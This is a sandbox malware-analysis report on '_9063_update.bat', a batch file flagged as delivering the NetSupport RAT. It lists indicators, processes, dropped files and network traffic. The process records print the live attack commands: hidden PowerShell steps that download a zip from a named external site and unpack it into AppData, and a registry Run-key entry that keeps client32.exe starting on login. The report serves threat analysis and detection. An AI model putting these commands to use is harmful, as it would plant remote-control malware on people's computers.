File name:

_9063_update.bat

Full analysis: https://app.any.run/tasks/ac9c33dd-e2bc-49e6-b3f4-7f528238206f
Verdict: Malicious activity
Threats:

NetSupport RAT is a malicious adaptation of the legitimate NetSupport Manager, a remote access tool used for IT support, which cybercriminals exploit to gain unauthorized control over systems. It has gained significant traction due to its sophisticated evasion techniques, widespread distribution campaigns, and the challenge it poses to security professionals who must distinguish between legitimate and malicious uses of the underlying software.

Malware Trends Tracker     >>>
Analysis date: April 29, 2025, 08:47:48
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
netsupport
rmm-tool
remote
auto-reg
arch-exec
tool
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (36114), with CRLF line terminators
MD5:

D60980E6066C58706C487F77863A2008

SHA1:

3498E5123F367AB41ABE107887AECDF59393F286

SHA256:

D6142F48664208710BAB9FCAB8DFCDA66AD75AD756D2CE9C3AA243DCBC29BF4A

SSDEEP:

3072:gHWplleBqYFAfxWhM/HWplleBqYFAfxWhRHWplleBqYFAfxWhL:BYFAf/iYFAf7YFAf6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 1096)

    • Executing a file with an untrusted certificate

      • client32.exe (PID: 6404)
      • client32.exe (PID: 4692)
      • client32.exe (PID: 4724)

    • Changes the autorun value in the registry

      • reg.exe (PID: 6816)

    • NETSUPPORT mutex has been found

      • client32.exe (PID: 6404)
      • client32.exe (PID: 4692)

    • Connects to the CnC server

      • client32.exe (PID: 6404)

    • NETSUPPORT has been detected (SURICATA)

      • client32.exe (PID: 6404)

    • NETSUPPORT has been detected (YARA)

      • client32.exe (PID: 6404)

  • SUSPICIOUS

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 1660)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 1096)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1056)

    • Drop NetSupport executable file

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 1096)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 1096)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1096)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 1096)

    • The executable file from the user directory is run by the CMD process

      • client32.exe (PID: 6404)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1056)

    • Connects to the server without a host name

      • client32.exe (PID: 6404)

    • There is functionality for communication over UDP network (YARA)

      • client32.exe (PID: 6404)

    • There is functionality for taking screenshot (YARA)

      • client32.exe (PID: 6404)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 1660)
      • slui.exe (PID: 1676)

    • The sample compiled with english language support

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 1096)

    • Disables trace logs

      • powershell.exe (PID: 1660)

    • Auto-launch of the file from Registry key

      • reg.exe (PID: 6816)

    • Checks supported languages

      • client32.exe (PID: 6404)
      • client32.exe (PID: 4692)

    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 4152)
      • OpenWith.exe (PID: 5384)
      • OpenWith.exe (PID: 3032)

    • Reads the computer name

      • client32.exe (PID: 6404)
      • client32.exe (PID: 4692)

    • Manual execution by a user

      • client32.exe (PID: 4692)
      • client32.exe (PID: 4724)
      • OpenWith.exe (PID: 4152)
      • notepad.exe (PID: 2692)
      • notepad.exe (PID: 5112)
      • notepad.exe (PID: 5212)
      • OpenWith.exe (PID: 5384)
      • OpenWith.exe (PID: 3032)
      • notepad.exe (PID: 7048)

    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 2692)
      • notepad.exe (PID: 5112)
      • notepad.exe (PID: 5212)
      • notepad.exe (PID: 7048)

    • Reads the software policy settings

      • slui.exe (PID: 1676)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
139
Monitored processes
16
Malicious processes
5
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe powershell.exe #NETSUPPORT client32.exe reg.exe slui.exe #NETSUPPORT client32.exe no specs client32.exe no specs openwith.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs openwith.exe no specs openwith.exe no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1056C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\_9063_update.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1096powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\admin\AppData\Roaming\Applica.zip', 'C:\Users\admin\AppData\Roaming\Option')"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1660powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://www.eurobrandsindia.com/wp-content/fore.zip?fd68cc8e93deddf83ed1' -OutFile 'C:\Users\admin\AppData\Roaming\Applica.zip'" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1676C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2568\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2692"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\client32.iniC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
3032"C:\WINDOWS\System32\OpenWith.exe" C:\Users\admin\Desktop\lol.cfgC:\Windows\System32\OpenWith.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
2147943623
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
4152"C:\WINDOWS\System32\OpenWith.exe" C:\Users\admin\Desktop\NSM.LICC:\Windows\System32\OpenWith.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
2147943623
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
4692C:\Users\admin\AppData\Roaming\Option\client32.exeC:\Users\admin\AppData\Roaming\Option\client32.exe
explorer.exe
User:
admin
Company:
NetSupport Ltd
Integrity Level:
MEDIUM
Description:
NetSupport Client Application
Exit code:
255
Version:
V11.30
Modules
Images
c:\users\admin\appdata\roaming\option\client32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\users\admin\appdata\roaming\option\pcicl32.dll
c:\windows\syswow64\user32.dll
4724"C:\Users\admin\Desktop\client32.exe" C:\Users\admin\Desktop\client32.exeexplorer.exe
User:
admin
Company:
NetSupport Ltd
Integrity Level:
MEDIUM
Description:
NetSupport Client Application
Exit code:
3221225781
Version:
V11.30
Modules
Images
c:\users\admin\desktop\client32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
Total events
15 456
Read events
15 455
Write events
1
Delete events
0

Modification events

(PID) Process:(6816) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Support11
Value:
C:\Users\admin\AppData\Roaming\Option\client32.exe
Executable files
28
Suspicious files
5
Text files
14
Unknown types
0

Dropped files

PID
Process
Filename
Type
1660powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lcym5pxq.m3q.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1660powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_o4vsptmm.ltp.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1096powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p1rx41j1.kwd.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1660powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:DF42E835FDAC5FAED15724A33963AAC3
SHA256:1AE6906DEE8E8BC2C97684FDD88E7BCCB5C71AFBF4595A036C801280CE775B17
1096powershell.exeC:\Users\admin\AppData\Roaming\Option\AudioCapture.dllexecutable
MD5:2A82792F7B45D537EDFE58EB758C1197
SHA256:05AA13A6C1D18F691E552F04A996960917202A322D0DACFD330E553AD56978ED
1096powershell.exeC:\Users\admin\AppData\Roaming\Option\KBDTAM99.DLLexecutable
MD5:CCC736781CF4A49F42CD07C703B3A18B
SHA256:000C4B5B50966634DF58078511794F83690D693FCCF2ACA5C970C20981B29556
1096powershell.exeC:\Users\admin\AppData\Roaming\Option\TsUsbRedirectionGroupPolicyExtension.dllexecutable
MD5:D89CDA3FF8427DA82DE6CCE39008C5BC
SHA256:F44CC1E23D0D192DCFD84069B27704CD0B2A8E7720EEE43656F57CB474433762
1096powershell.exeC:\Users\admin\AppData\Roaming\Option\PCICHEK.DLLexecutable
MD5:E311935A26EE920D5B7176CFA469253C
SHA256:0038AB626624FA2DF9F65DD5E310B1206A9CD4D8AB7E65FB091CC25F13EBD34E
1096powershell.exeC:\Users\admin\AppData\Roaming\Option\comcat.dllexecutable
MD5:835FF05A3F5E16E0FE41E515EA398BD4
SHA256:8DCFB1E6AA965DF4BD4C0551D03BDFD6472C80219ADA4671910958688FBB4AB6
1096powershell.exeC:\Users\admin\AppData\Roaming\Option\client32.exeexecutable
MD5:FCE17B987F321DCE852C8A52116E7EB6
SHA256:AFC45CC0DF7F7E481BFF45C6F62A6418B6AE4C8B474EC36113E05AB7CA7E2743
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
34
TCP/UDP connections
58
DNS requests
26
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
304
20.109.210.53:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
4268
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
4268
SIHClient.exe
GET
200
23.53.40.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4268
SIHClient.exe
GET
200
23.53.40.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
GET
200
20.242.39.171:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
unknown
4268
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
4268
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4268
SIHClient.exe
GET
200
23.53.40.176:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
4268
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
4268
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.66:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1660
powershell.exe
162.159.134.42:443
www.eurobrandsindia.com
CLOUDFLARENET
unknown
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
2112
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2104
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
4268
SIHClient.exe
20.109.210.53:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.66
  • 20.190.160.131
  • 20.190.160.132
  • 40.126.32.72
  • 20.190.160.64
  • 40.126.32.74
  • 40.126.32.133
  • 40.126.32.134
whitelisted
google.com
  • 142.250.186.174
whitelisted
www.eurobrandsindia.com
  • 162.159.134.42
unknown
slscr.update.microsoft.com
  • 20.109.210.53
  • 4.245.163.56
whitelisted
crl.microsoft.com
  • 23.53.40.176
  • 23.53.40.178
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Misc activity
ET REMOTE_ACCESS NetSupport Remote Admin Checkin
6404
client32.exe
Potentially Bad Traffic
ET INFO HTTP traffic on port 443 (POST)
6404
client32.exe
Misc activity
ET REMOTE_ACCESS NetSupport Remote Admin Checkin
6404
client32.exe
A Network Trojan was detected
REMOTE [ANY.RUN] NetSupport RAT
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
_9063_update.bat